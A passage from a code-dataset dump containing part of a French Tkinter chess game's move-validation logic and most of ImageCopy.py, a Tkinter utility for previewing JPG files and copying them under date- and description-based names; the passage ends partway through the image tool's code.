Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"N\" and ((abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\treturn position[Y][X] == \"R\" and (abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)\r\n\r\n###################################################ROI BLANC############################################################\r\n\r\n\t\t\telif piece==28:\r\n\t\t\t\tif position[Y][X] != \"R\" and position[Y][X][-1] != \"N\":\r\n\t\t\t\t\treturn False\r\n\t\t\t\telif abs(posX-X)<=1 and abs(posY-Y)<=1 and position[Y][X][-1] == \"N\":\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\tif Y==7 and X==2 and position[Y][0]==\"tourB\" and position[Y][1]==\"R\" and position[Y][2]==\"R\" and position[Y][3]==\"R\" and position[Y][4] ==\"roiB\":\r\n\t\t\t\t\tposition[Y][3] = \"roiB\"\r\n\t\t\t\t\tposition[Y][4] = \"R\"\r\n\t\t\t\t\tif coupLegal():\r\n\t\t\t\t\t\tposition[Y][3] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\t\t\t\t\t\tcoup = 0\r\n\t\t\t\t\t\tnbreCoups = len(coups)-2\r\n\t\t\t\t\t\tprint(nbreCoups)\r\n\t\t\t\t\t\twhile coup!=nbreCoups and (coups[coup][0]!=\"t\" or coups[coup][2]!=0 or coups[coup][3]!=Y) and (coups[coup][0]!=\"r\"):\r\n\t\t\t\t\t\t\tcoup+=2\r\n\t\t\t\t\t\tif coup==nbreCoups:\r\n\t\t\t\t\t\t\tpiece = echiquier.find_enclosed(0*64+32+marge-32, Y*64+32+marge-32, 0*64+32+marge+32, Y*64+32+marge+32)[0]\r\n\t\t\t\t\t\t\techiquier.coords(piece, 3*64+32+marge, 
7*64+32+marge)\r\n\t\t\t\t\t\t\tposition[7][0] = \"R\"\r\n\t\t\t\t\t\t\tposition[7][3] = \"tourB\"\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tposition[Y][3] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\t\t\t\telif Y==7 and X==6 and position[Y][4]==\"roiB\" and position[Y][5]==\"R\" and position[Y][6]==\"R\" and position[Y][7] ==\"tourB\":\r\n\t\t\t\t\tposition[Y][5] = \"roiB\"\r\n\t\t\t\t\tposition[Y][4] = \"R\"\r\n\t\t\t\t\tif coupLegal():\r\n\t\t\t\t\t\tposition[Y][5] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\t\t\t\t\t\tcoup = 0\r\n\t\t\t\t\t\tnbreCoups = len(coups)-2\r\n\t\t\t\t\t\tprint(nbreCoups)\r\n\t\t\t\t\t\twhile coup!=nbreCoups and (coups[coup][0]!=\"t\" or coups[coup][2]!=7 or coups[coup][3]!=Y) and (coups[coup][0]!=\"r\"):\r\n\t\t\t\t\t\t\tcoup+=2\r\n\t\t\t\t\t\tif coup==nbreCoups:\r\n\t\t\t\t\t\t\tpiece = echiquier.find_enclosed(7*64+32+marge-32, 7*64+32+marge-32, 7*64+32+marge+32, 7*64+32+marge+32)[0]\r\n\t\t\t\t\t\t\techiquier.coords(piece, 5*64+32+marge, 7*64+32+marge)\r\n\t\t\t\t\t\t\tposition[7][7] = \"R\"\r\n\t\t\t\t\t\t\tposition[7][5] = \"tourB\"\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tposition[Y][5] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\r\n\t\t\t\treturn abs(posX-X)<=1 and abs(posY-Y)<=1\r\n\r\n###################################################PIONS BLANCS##########################################################\r\n\r\n\t\t\telif piece>=16 and piece<=23:\r\n\t\t\t\tif position[Y][X][-1] == \"N\" and posY-Y==1 and abs(posX-X)==1:\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\tfor ligne in range(Y, posY):\r\n\t\t\t\t\tif position[ligne][X] != \"R\":\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\tif Y==2 and coups[-1][0] == \"p\" and coups[-1][4] == X and coups[-1][3]+2==coups[-1][5] and posY==3 and abs(posX-X)==1:\r\n\t\t\t\t\tposition[Y+1][X] = \"R\"\r\n\t\t\t\t\tcapturePiece(X, (Y+1))\r\n\t\t\t\t\treturn True\r\n\t\t\t\tif posY==6:\r\n\t\t\t\t\treturn (posY-Y<=2 and posY>Y and posX==X)\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn (posY-Y<=1 and posY>Y and posX==X)\r\n\r\n\r\n\r\n#----------------------------------------------------Trait aux noirs----------------------------------------------------#\r\n#\r\n#\r\n\telif piece>=0 and piece<=15:\r\n\t\tif joueur == \"blanc\":\r\n\t\t\t#showinfo(\"Alerte\", \"C'est aux blancs de jouer\")\r\n\t\t\treturn False\r\n\t\telse:\r\n\r\n###################################################TOUR NOIRE###########################################################\r\n\r\n\t\t\tif piece==0 or piece==7:\r\n\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn X==posX or Y==posY\r\n\t\t\t\telif position[Y][X][-1] == \"B\" and (X==posX or Y==posY):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n###################################################CAVALIER NOIR########################################################\r\n\r\n\t\t\telif piece==1 or piece==6:\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2)\r\n\t\t\t\telif position[Y][X][-1] == \"B\":\r\n\t\t\t\t\tif (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and 
abs(posY-Y)==2):\r\n\t\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n####################################################FOU NOIR############################################################\r\n\r\n\t\t\telif piece==2 or piece==5:\r\n\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne-min(posY,Y), colonne-min(posX,X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne+colonne, max(posY, Y)+min(posX, X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"B\" and abs(posX-X)==abs(posY-Y):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn position[Y][X] == \"R\" and abs(posX-X)==abs(posY-Y)\r\n\r\n###################################################DAME NOIRE###########################################################\r\n\r\n\t\t\telif piece==3:\r\n\t\t\t\tif (X==posX or Y==posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"B\" and ((abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\treturn position[Y][X] == \"R\" and (abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)\r\n\r\n###################################################ROI NOIR#############################################################\r\n\r\n\t\t\telif piece==4:\r\n\t\t\t\tif position[Y][X] != \"R\" and position[Y][X][-1] != \"B\":\r\n\t\t\t\t\treturn False\r\n\t\t\t\telif abs(posX-X)<=1 and abs(posY-Y)<=1 and position[Y][X][-1] == \"B\":\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\treturn abs(posX-X)<=1 and abs(posY-Y)<=1\r\n\r\n###################################################PIONS 
NOIRS##########################################################\r\n\r\n\t\t\telif piece>=8 and piece<=15:\r\n\t\t\t\tif position[Y][X][-1] == \"B\" and Y-posY==1 and abs(posX-X)==1:\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\tfor ligne in range(posY+1, Y+1):\r\n\t\t\t\t\tif position[ligne][X] != \"R\":\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\tif Y==5 and coups[-1][0] == \"p\" and coups[-1][4] == X and coups[-1][3]==coups[-1][5]+2 and posY==4 and abs(posX-X)==1:\r\n\t\t\t\t\tposition[Y-1][X] = \"R\"\r\n\t\t\t\t\tcapturePiece(X, (Y-1))\r\n\t\t\t\t\treturn True\r\n\t\t\t\tif posY==1:\r\n\t\t\t\t\treturn (Y-posY<=2 and Y>posY and posX==X)\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn (Y-posY<=1 and Y>posY and posX==X)\r\n\r\n\t\r\n\r\ndef nouvellePartie():\r\n\tglobal position, coups\r\n\t#showinfo(\"Début en cours\", \"Une nouvelle partie est sur le point de débuter\")\r\n\tposition = [[\"tourN\",\"cavalierN\",\"fouN\",\"dameN\",\"roiN\",\"fouN\",\"cavalierN\",\"tourN\"],[\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\",\"pionN\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\",\"R\"],[\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\",\"pionB\"],[\"tourB\",\"cavalierB\",\"fouB\",\"dameB\",\"roiB\",\"fouB\",\"cavalierB\",\"tourB\"]]\r\n\tcoups = []\r\n\tplacerPieces()\r\n\r\ndef lancement():\r\n\tnouvellePartie()\r\n\r\n\r\nlancement()\r\nroot.mainloop()\r\n" }, { "alpha_fraction": 0.6041190028190613, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 21, "blob_id": "fc6b39e507fa980ea263dedfc04ddb9a49180920", "content_id": "6d33cf8e9e88154a6a70400a5147e1cd54636b7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 437, "license_type": "no_license", "max_line_length": 68, "num_lines": 19, "path": "/test.py", "repo_name": "NicoTirel/jeuEchecs", "src_encoding": "UTF-8", "text": "from tkinter import *\r\nfrom functools import partial\r\n\r\nroot = Tk()\r\n\r\nroot['bg']='#A4A4A4'\r\nroot.geometry(\"1000x600+10+10\")\r\nroot.title('Crashtest')\r\n\r\ndef hello(piece, event):\r\n\tprint(\"yousk2\")\r\n\r\nechiquier = Canvas(root, width=600, height=600, background='white')\r\nechiquier.pack()\r\n\r\ncarre = echiquier.create_rectangle(200, 200, 300, 300, fill=\"black\")\r\nechiquier.tag_bind(carre, '<Button-1>', partial(hello, 1))\r\n\r\nroot.mainloop()\r\n" } ]
2
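The jeuEchecs record above centres on `coupAutorise`, which accepts a move only if it passes two checks: the piece's geometric rule, and a scan of the squares lying between the start and end on the `position[y][x]` board, where `"R"` marks an empty square. The sketch below is an editorial illustration of that pattern; it is not code from the repository, and the helper names are invented.

```python
# Illustration of the two checks combined in coupAutorise (sketch, not repo code).
# Board convention borrowed from the record above: position[y][x], "R" = empty.

def knight_move_ok(px, py, x, y):
    """Knight geometry: one coordinate changes by 1, the other by 2."""
    return {abs(px - x), abs(py - y)} == {1, 2}

def rook_path_clear(position, px, py, x, y):
    """Rook geometry plus clearance of the squares strictly between the ends."""
    if px != x and py != y:
        return False                      # not a straight line
    dx = (x > px) - (x < px)              # step of -1, 0 or +1 per axis
    dy = (y > py) - (y < py)
    cx, cy = px + dx, py + dy
    while (cx, cy) != (x, y):
        if position[cy][cx] != "R":       # a piece blocks the path
            return False
        cx, cy = cx + dx, cy + dy
    return True                           # destination occupancy is checked separately
```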
peverett/ImageCopy
https://github.com/peverett/ImageCopy
495a1c51ea92c73785349873b0acecca5eb9936e
5bcac7ba5fca249ee26d7fa3dbf24a1dc388fbf4
4b0531926bb5ef4c7b088653ae7ce3126bcc3e83
refs/heads/master
2020-05-19T13:07:46.268392
2019-06-27T16:01:14
2019-06-27T16:01:14
185,032,288
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5493024587631226, "alphanum_fraction": 0.5559512972831726, "avg_line_length": 33.660491943359375, "blob_id": "e3ea963466380ee37328bcf0998be28fbb92ff66", "content_id": "e8d08361ea34f73458bacc9095ab5efef95d1d45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16845, "license_type": "no_license", "max_line_length": 82, "num_lines": 486, "path": "/ImageCopy.py", "repo_name": "peverett/ImageCopy", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\"\"\"Copy Digital Camera IMages (DCIM) from a source \nMemory Card or USB to a specified destination folder. \n\nAllows image preview for selective copying,\nfile renaming based on EXIF data such as Date \nand Time image was made.\"\"\"\n\n__version__ = \"1.0\"\n__author__ = \"[email protected]\"\n__all__ = ['__version__', '__author__']\n\nimport os\nimport configparser\nimport glob\nimport sys\nif sys.version_info[0] > 2:\n import tkinter.font as tkFont\n from tkinter import *\n from tkinter import messagebox, filedialog\nelse:\n import tkFont\n from Tkinter import *\nfrom PIL import Image, ImageTk\nfrom ImageScale import ImageCanvas\nfrom datetime import datetime\nfrom shutil import copyfile\n\ndef GetConfigFilename():\n \"\"\"Return the config file name based on the following rules:\n * Config file is in the same directory as the python script.\n * Config file has the same name but with extention '.ini'\n \"\"\"\n thisfile = os.path.splitext(\n os.path.abspath(__file__)\n )[0]\n return os.path.join(\n '.'.join([thisfile, 'ini'])\n )\n \ndef UpdateConfigFile(config):\n \"\"\"Update the Config File by writing it.\"\"\"\n with open(GetConfigFilename(), 'w') as cf:\n config.write(cf)\n\ndef LoadConfigFile():\n \"\"\"Load the Config File. 
If it doesn't exist, then create it.\"\"\"\n config = configparser.ConfigParser()\n\n # If we can't read a config, create one.\n if not config.read(GetConfigFilename()):\n home = os.path.expanduser('~')\n \n config['DEFAULT'] = {\n 'source': 'C:\\\\',\n 'destination': home,\n 'use_date': 'no',\n 'use_time': 'no',\n 'use_user': 'no',\n 'use_name': 'yes',\n 'descr': 'Example1,Example2',\n }\n\n UpdateConfigFile(config)\n\n return config\n\ndef ListJpgFiles(path):\n \"\"\"return a list of all files with the .jpg extension in the path passed.\"\"\"\n jpgfiles = glob.glob(\n os.path.join(path, '*.jpg')\n )\n return jpgfiles\n\nclass ImageCopyController(object):\n \"\"\"ImageCopy Controller Class\"\"\"\n \n def __init__(self, root):\n self.root = root\n\n # Tkinter variables \n self.src_str = StringVar()\n self.dst_str = StringVar()\n self.zoom_str = StringVar()\n self.user_str = StringVar()\n self.date_str = StringVar()\n self.time_str = StringVar()\n self.fn_str = StringVar()\n self.fnum_str = StringVar()\n self.chosen = StringVar()\n\n self.cb_date = IntVar()\n self.cb_time = IntVar()\n self.cb_name = IntVar()\n self.cb_user = IntVar()\n\n # Get defaults from Config file, or set them!\n self.config = LoadConfigFile()\n self.jpgfiles = ListJpgFiles(self.config['DEFAULT']['source'])\n self.jpgidx = 0 # Index on first image in the list.\n self.jpglen = len(self.jpgfiles)\n self.cb_date.set(self.config.getboolean('DEFAULT','use_date'))\n self.cb_time.set(self.config.getboolean('DEFAULT','use_time'))\n self.cb_user.set(self.config.getboolean('DEFAULT','use_user'))\n self.cb_name.set(self.config.getboolean('DEFAULT','use_name'))\n\n self.root.bind('<Destroy>', self.destroy_cmd)\n\n self.MenuBar() \n\n left_frm = Frame(self.root)\n left_frm.pack(side=LEFT, fill=BOTH, expand=YES)\n\n self.ic = ImageCanvas(left_frm)\n self.button_frame(left_frm)\n self.source_frame(left_frm)\n self.destination_frame(left_frm)\n\n right_frm = Frame(self.root)\n right_frm.pack(side=RIGHT, fill=Y, expand=NO)\n\n self.file_info_frame(right_frm)\n self.image_options_frame(right_frm)\n self.user_input_frame(right_frm)\n\n #root.state('zoomed')\n\n if self.jpgfiles:\n self.update_image_source()\n \n def copy_file_cmd(self):\n copyfile(self.src_str.get(), self.dst_str.get())\n\n def destroy_cmd(self, event):\n \"\"\"What happens when the app is closed down.\"\"\"\n self.config['DEFAULT']['descr'] = ','.join(self.usr_descr)\n UpdateConfigFile(self.config)\n\n def options_cmd(self):\n \"\"\"Action on check box being ticked.\"\"\"\n self.update_options()\n self.update_destination()\n\n def update_options(self):\n \"\"\"Update options such as image file options or source and destination\n directories.\"\"\"\n self.config['DEFAULT']['use_date'] = 'yes' if self.cb_date.get() else 'no'\n self.config['DEFAULT']['use_time'] = 'yes' if self.cb_time.get() else 'no'\n self.config['DEFAULT']['use_user'] = 'yes' if self.cb_user.get() else 'no'\n self.config['DEFAULT']['use_name'] = 'yes' if self.cb_name.get() else 'no'\n\n def update_destination(self):\n \"\"\"Update the destination file name.\"\"\"\n image =self.jpgfiles[self.jpgidx]\n cdt = datetime.fromtimestamp(os.path.getctime(image))\n self.date_str.set(cdt.strftime('%Y-%m-%d'))\n self.time_str.set(cdt.strftime('%H:%M:%S'))\n\n cfn = list()\n if self.cb_date.get():\n cfn.append(cdt.strftime('%Y%m%d'))\n if self.cb_time.get():\n cfn.append(cdt.strftime('%H%M%S'))\n ud = self.chosen.get()\n if len(ud) and self.cb_user.get():\n cfn.append(ud)\n if self.cb_name.get():\n 
cfn.append(self.fn_str.get())\n\n copy_name = os.path.join(\n self.config['DEFAULT']['Destination'],\n \"{}.jpg\".format('_'.join(cfn)))\n self.dst_str.set(copy_name)\n self.usr_descr = self.listbox.get(0, END)\n\n def update_image_source(self):\n image =self.jpgfiles[self.jpgidx]\n\n self.src_str.set(image)\n self.fn_str.set(os.path.basename(image))\n self.fnum_str.set(\"{} of {}\".format(self.jpgidx+1, self.jpglen))\n \n self.ic.load_image(image)\n self.zoom_str.set(\"{:d} %\".format(self.ic.get_zoom()))\n self.update_destination()\n\n def next_cmd(self):\n if self.jpgfiles:\n if self.jpgidx < self.jpglen-1:\n self.jpgidx += 1\n self.update_image_source()\n\n def prev_cmd(self):\n if self.jpgfiles:\n if self.jpgidx > 0:\n self.jpgidx -= 1\n self.update_image_source()\n\n def zoom_in(self):\n self.ic.zoom_in()\n self.zoom_str.set(\"{:d} %\".format(self.ic.get_zoom()))\n\n def zoom_out(self):\n self.ic.zoom_out()\n self.zoom_str.set(\"{:d} %\".format(self.ic.get_zoom()))\n\n def SetConfigDir(self, directory='destination'):\n \"\"\"Set the 'directory' in the configuration. By default this is the\n 'destination' directory.\n \"\"\"\n new_dir = os.path.normpath(\n filedialog.askdirectory(\n initialdir=self.config['DEFAULT'][directory],\n title=\"Select {} folder\".format(directory)\n )\n )\n \n if self.config['DEFAULT'][directory] != new_dir:\n self.config['DEFAULT'][directory] = new_dir\n\n def SetDestinationDir(self):\n self.SetConfigDir()\n self.update_destination()\n\n def SetSourceDir(self):\n self.SetConfigDir('Source')\n self.jpgfiles = ListJpgFiles( self.config['DEFAULT']['source'] )\n self.jpgidx = 0\n self.jpglen = len(self.jpgfiles)\n\n if not self.jpgfiles:\n messagebox.showwarning(\n \"No JPG files found!\",\n '\\n'.join([\n \"No JPG files found In directory:\",\n self.config['DEFAULT']['source']\n ])\n )\n else:\n self.update_image_source()\n\n def AboutImageCopy(self):\n messagebox.showinfo(\n \"About: ImageCopy\",\n ''.join([\n __doc__, '\\n\\n',\n 'Author: ', __author__, '\\n\\n'\n 'Version: ', __version__,\n ])\n )\n\n def MenuBar(self):\n \"\"\"Application Menu Bar\"\"\"\n menubar = Menu(self.root)\n \n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Set Source Dir\", command=self.SetSourceDir)\n filemenu.add_command(\n label=\"Set Destination Dir\", command=self.SetDestinationDir)\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=self.root.quit)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.AboutImageCopy)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n self.root.config(menu=menubar)\n\n def button_frame(self, parent):\n \"\"\"Frame to contain buttons for moving through images and zooming the\n current image.\"\"\"\n frm = Frame(parent, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n prev = Button(\n frm, text=\"<< Prev\", padx=5, pady=5, command=self.prev_cmd)\n prev.pack(side=LEFT, fill=X, expand=YES)\n\n zoom_in = Button(\n frm, text=\"Zoom In (+)\", padx=5, pady=5, command=self.zoom_in)\n zoom_in.pack(side=LEFT, fill=X, expand=YES)\n\n copy_image = Button(\n frm, text=\"Copy Image\", padx=5, pady=5, \n command=self.copy_file_cmd)\n copy_image.pack(side=LEFT, fill=X, expand=YES)\n\n zoom_out = Button(\n frm, text=\"Zoom Out (-)\", padx=5, pady=5, command=self.zoom_out)\n zoom_out.pack(side=LEFT, fill=X, expand=YES)\n\n next = Button(\n frm, text=\"Next >>\", padx=5, pady=5, command=self.next_cmd)\n next.pack(side=LEFT, 
fill=X, expand=YES)\n\n def source_frame(self, parent):\n \"\"\"Frame to contain the labels for displaying the source path & file\"\"\"\n frm = Frame(parent, bd=1)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n legend = Label(\n frm, text=\"Source:\", width=15, anchor=W, padx=5)\n legend.pack(side=LEFT, fill=X, expand=NO)\n\n info = Label(\n frm, bd=5, bg='black', fg='white', anchor=W, \n textvariable=self.src_str, width=85, padx=5) \n info.pack(side=LEFT, fill=X, expand=YES)\n \n def destination_frame(self, parent):\n \"\"\"Frame to contain the labels for displaying the destination path\n and filename.\"\"\"\n frm = Frame(parent, bd=1)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n legend = Label(\n frm, text=\"Destination:\", anchor=W, width=15, padx=5)\n legend.pack(side=LEFT, fill=X, expand=NO)\n\n info = Label(\n frm, bd=5, bg='black', fg='white', anchor=W, \n textvariable=self.dst_str, width=85, padx=5) \n info.pack(side=LEFT, fill=X, expand=YES)\n\n def file_info_frame(self, parent):\n \"\"\"Frame to display the image information.\"\"\"\n frm = Frame(parent, relief=RIDGE, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n title = Label(\n frm, text=\"File Information\", width=30, \n justify=CENTER, pady=10, padx=5)\n title.pack(side=TOP, fill=X, expand=NO)\n\n fnum_frame = Frame(frm)\n fnum_frame.pack(side=TOP, fill=X, expand=NO)\n fn_legend = Label(\n fnum_frame, text=\"File #:\", width=10, \n anchor=W, padx=5, pady=5)\n fn_legend.pack(side=LEFT, fill=X, expand=NO)\n filenum = Label(\n fnum_frame, textvariable=self.fnum_str, bg='black', fg='white',\n anchor=W, width=20)\n filenum.pack(side=LEFT, fill=X, expand=NO)\n\n fn_frame = Frame(frm)\n fn_frame.pack(side=TOP, fill=X, expand=NO)\n fn_legend = Label(\n fn_frame, text=\"File name:\", width=10, \n anchor=W, padx=5, pady=5)\n fn_legend.pack(side=LEFT, fill=X, expand=NO)\n filename = Label(\n fn_frame, textvariable=self.fn_str, bg='black', fg='white',\n anchor=W, width=20)\n filename.pack(side=LEFT, fill=X, expand=NO)\n\n dt_frame = Frame(frm)\n dt_frame.pack(side=TOP, fill=X, expand=NO)\n dt_legend = Label(\n dt_frame, text=\"Create date:\", width=10, \n anchor=W, padx=5, pady=5)\n dt_legend.pack(side=LEFT, fill=X, expand=NO)\n date = Label(\n dt_frame, textvariable=self.date_str, bg='black', fg='white',\n anchor=W, width=20)\n date.pack(side=LEFT, fill=X, expand=NO)\n\n tm_frame = Frame(frm)\n tm_frame.pack(side=TOP, fill=X, expand=NO)\n tm_legend = Label(\n tm_frame, text=\"Create time:\", width=10, \n anchor=W, padx=5, pady=5)\n tm_legend.pack(side=LEFT, fill=X, expand=NO)\n date = Label(\n tm_frame, textvariable=self.time_str, bg='black', fg='white',\n anchor=W, width=20)\n date.pack(side=LEFT, fill=X, expand=NO)\n\n zm_frame = Frame(frm)\n zm_frame.pack(side=TOP, fill=X, expand=NO)\n zm_legend = Label(\n zm_frame, text=\"Image zoom:\", width=10, \n anchor=W, padx=5, pady=5)\n zm_legend.pack(side=LEFT, fill=X, expand=NO)\n date = Label(\n zm_frame, textvariable=self.zoom_str, bg='black', fg='white',\n anchor=W, width=20)\n date.pack(side=LEFT, fill=X, expand=NO)\n\n def user_input_frame(self, parent):\n \"\"\"Frame for user to input a part of the filename when copied.\n Entry box for user input.\n List for history of last 10 user inputs.\"\"\"\n frm = Frame(parent, relief=RIDGE, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n title = Label(\n frm, text=\"User Description\", width=30, \n justify=CENTER, pady=5, padx=5)\n title.pack(side=TOP, fill=X, expand=NO)\n \n selected = Label(frm, textvariable=self.chosen, bg='black', 
fg='white')\n selected.pack(side=TOP, fill=X, expand=NO)\n\n ufrm = Frame(frm)\n ufrm.pack(side=TOP, fill=X, expand=NO)\n\n user_entry = Entry(\n ufrm, textvariable=self.user_str, width=20, bd=5, \n bg='black', fg='white')\n user_entry.pack(side=LEFT, fill=X, expand=YES)\n\n add_btn = Button(\n ufrm, text=\"Add\", padx=10, pady=5, anchor=E,\n command=self.update_select)\n add_btn.pack(side=LEFT, fill=X, expand=NO)\n\n self.listbox = Listbox(frm, selectmode=SINGLE)\n self.listbox.pack(side=TOP, fill=X, expand=NO)\n self.listbox.bind('<Double-Button-1>', self.list_select)\n\n for choice in self.config['DEFAULT']['descr'].split(','):\n self.listbox.insert(END, choice)\n\n def update_select(self, event=None):\n if not len(self.user_str.get()):\n return\n\n self.listbox.insert(0, self.user_str.get())\n self.chosen.set(self.user_str.get())\n if self.listbox.size() > 10:\n self.listbox.delete(END)\n\n self.user_str.set(\"\")\n self.update_destination()\n \n \n def list_select(self, event):\n sel = self.listbox.curselection()[0]\n temp = self.listbox.get(sel)\n self.chosen.set(temp)\n self.listbox.delete(sel)\n self.listbox.insert(0, temp)\n self.update_destination()\n\n def image_options_frame(self, parent):\n frm = Frame(parent, relief=RIDGE, bd=5)\n frm.pack(side=TOP, fill=X, expand=NO)\n\n title = Label(\n frm, text=\"Destination Name Options\", width=30, \n justify=CENTER, pady=5, padx=5)\n 